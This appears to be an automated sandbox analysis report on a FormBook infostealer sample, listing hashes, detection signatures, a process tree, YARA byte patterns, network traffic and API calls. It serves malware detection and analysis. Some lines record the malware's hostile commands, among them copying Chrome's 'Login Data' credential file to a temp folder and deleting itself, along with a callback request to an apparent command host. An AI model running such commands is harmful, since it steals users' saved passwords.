Loading ...

Play interactive tourEdit tour

Analysis Report ewuTygg1Bw.exe

Overview

General Information

Sample Name:ewuTygg1Bw.exe
MD5:0060b9cfb3b239c92f18f3b1ae7d8c3c
SHA1:7170ef2a931341c0c4fb152c1552a5049eca68ae
SHA256:bb973839df53081c969a7e6647bdfc2d3090b43b496fe8e2244a51a604264112

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ewuTygg1Bw.exe (PID: 5096 cmdline: 'C:\Users\user\Desktop\ewuTygg1Bw.exe' MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
    • ewuTygg1Bw.exe (PID: 724 cmdline: {path} MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
      • explorer.exe (PID: 2856 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • cscript.exe (PID: 5028 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 400 cmdline: /c del 'C:\Users\user\Desktop\ewuTygg1Bw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2772 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vgaot707b.exe (PID: 2492 cmdline: C:\Program Files (x86)\Iobk\vgaot707b.exe MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
          • vgaot707b.exe (PID: 1540 cmdline: {path} MD5: 0060B9CFB3B239C92F18F3B1AE7D8C3C)
        • autochk.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 67DFCAFAAD1B556C7731CDFDD4F4B803)
        • raserver.exe (PID: 3100 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18449:$sqlite3step: 68 34 1C 7B E1
    • 0x1855c:$sqlite3step: 68 34 1C 7B E1
    • 0x18478:$sqlite3text: 68 38 2A 90 C5
    • 0x1859d:$sqlite3text: 68 38 2A 90 C5
    • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18449:$sqlite3step: 68 34 1C 7B E1
      • 0x1855c:$sqlite3step: 68 34 1C 7B E1
      • 0x18478:$sqlite3text: 68 38 2A 90 C5
      • 0x1859d:$sqlite3text: 68 38 2A 90 C5
      • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      18.2.vgaot707b.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        18.2.vgaot707b.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18449:$sqlite3step: 68 34 1C 7B E1
        • 0x1855c:$sqlite3step: 68 34 1C 7B E1
        • 0x18478:$sqlite3text: 68 38 2A 90 C5
        • 0x1859d:$sqlite3text: 68 38 2A 90 C5
        • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
        18.2.vgaot707b.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        18.2.vgaot707b.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          18.2.vgaot707b.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17649:$sqlite3step: 68 34 1C 7B E1
          • 0x1775c:$sqlite3step: 68 34 1C 7B E1
          • 0x17678:$sqlite3text: 68 38 2A 90 C5
          • 0x1779d:$sqlite3text: 68 38 2A 90 C5
          • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 7 entries

          Sigma Overview


          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cscript.exe, ParentImage: C:\Windows\SysWOW64\cscript.exe, ParentProcessId: 5028, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2772

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Iobk\vgaot707b.exeVirustotal: Detection: 36%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: ewuTygg1Bw.exeVirustotal: Detection: 36%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Iobk\vgaot707b.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: ewuTygg1Bw.exeJoe Sandbox ML: detected
          Source: 18.2.vgaot707b.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 4x nop then pop ebx2_2_00407A77
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 4x nop then pop ebx2_2_00407A88
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 4x nop then pop edi2_2_0040E582
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 4x nop then pop edi2_2_00417D93
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx6_2_02DA7A88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx6_2_02DA7A77
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi6_2_02DB7D93
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi6_2_02DAE582
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 4x nop then pop ebx18_2_00407A77
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 4x nop then pop ebx18_2_00407A88
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 4x nop then pop edi18_2_0040E582
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 4x nop then pop edi18_2_00417D93

          Source: global trafficHTTP traffic detected: GET /4vx/?T4s=JVdfqtShaZLEdrfPMUiD2srIZ4Eny+NoRWx7/Ra+VhS0efzYbtMJqhi2JVU5dyBSSoIe&GlTD=Q87p3Xr0bF8LO HTTP/1.1Host: www.longfellowpurebreds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: GET /4vx/?T4s=JVdfqtShaZLEdrfPMUiD2srIZ4Eny+NoRWx7/Ra+VhS0efzYbtMJqhi2JVU5dyBSSoIe&GlTD=Q87p3Xr0bF8LO HTTP/1.1Host: www.longfellowpurebreds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.diamond-distinction.com
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000003.00000000.438142137.0000000003350000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cscript.exe, 00000006.00000002.832648097.00000000002A8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehpm3
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: ewuTygg1Bw.exe, 00000000.00000002.440483526.0000000005E06000.00000002.00000001.sdmp, explorer.exe, 00000003.00000000.457401824.000000000C926000.00000002.00000001.sdmp, vgaot707b.exe, 00000010.00000002.832874915.0000000005D56000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmpString found in binary or memory: https://www.msn.com/content/images/icons/Favi
          Source: cscript.exe, 00000006.00000002.832946218.000000000030F000.00000004.00000020.sdmpString found in binary or memory: https://www.msn.com/spartan/ientplocale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1&

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\983-T328\983logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\983-T328\983logrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cscript.exeDropped file: C:\Users\user\AppData\Roaming\983-T328\983logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.477365804.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.832075958.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.839323190.0000000002DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.476142243.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.477506017.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.833266130.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.436769508.0000000003E2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.828589258.0000000003E4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.839990858.0000000004560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.833493559.0000000000C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.vgaot707b.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.vgaot707b.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.ewuTygg1Bw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.ewuTygg1Bw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Windows\SysWOW64\cscript.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00419850 NtCreateFile,2_2_00419850
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00419900 NtReadFile,2_2_00419900
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00419980 NtClose,2_2_00419980
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00419A30 NtAllocateVirtualMemory,2_2_00419A30
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_004198FA NtReadFile,2_2_004198FA
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041997A NtClose,2_2_0041997A
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00419A2C NtAllocateVirtualMemory,2_2_00419A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A480 NtMapViewOfSection,LdrInitializeThunk,6_2_0480A480
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480ACE0 NtCreateMutant,LdrInitializeThunk,6_2_0480ACE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A410 NtQueryInformationToken,LdrInitializeThunk,6_2_0480A410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A470 NtSetInformationFile,LdrInitializeThunk,6_2_0480A470
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A540 NtDelayExecution,LdrInitializeThunk,6_2_0480A540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A560 NtQuerySystemInformation,LdrInitializeThunk,6_2_0480A560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A6A0 NtCreateSection,LdrInitializeThunk,6_2_0480A6A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A610 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0480A610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A750 NtCreateFile,LdrInitializeThunk,6_2_0480A750
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A800 NtSetValueKey,LdrInitializeThunk,6_2_0480A800
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A2D0 NtClose,LdrInitializeThunk,6_2_0480A2D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A240 NtReadFile,LdrInitializeThunk,6_2_0480A240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A260 NtWriteFile,LdrInitializeThunk,6_2_0480A260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A3D0 NtCreateKey,LdrInitializeThunk,6_2_0480A3D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A3E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0480A3E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A310 NtEnumerateValueKey,LdrInitializeThunk,6_2_0480A310
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A350 NtQueryValueKey,LdrInitializeThunk,6_2_0480A350
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0480A360 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0480A360
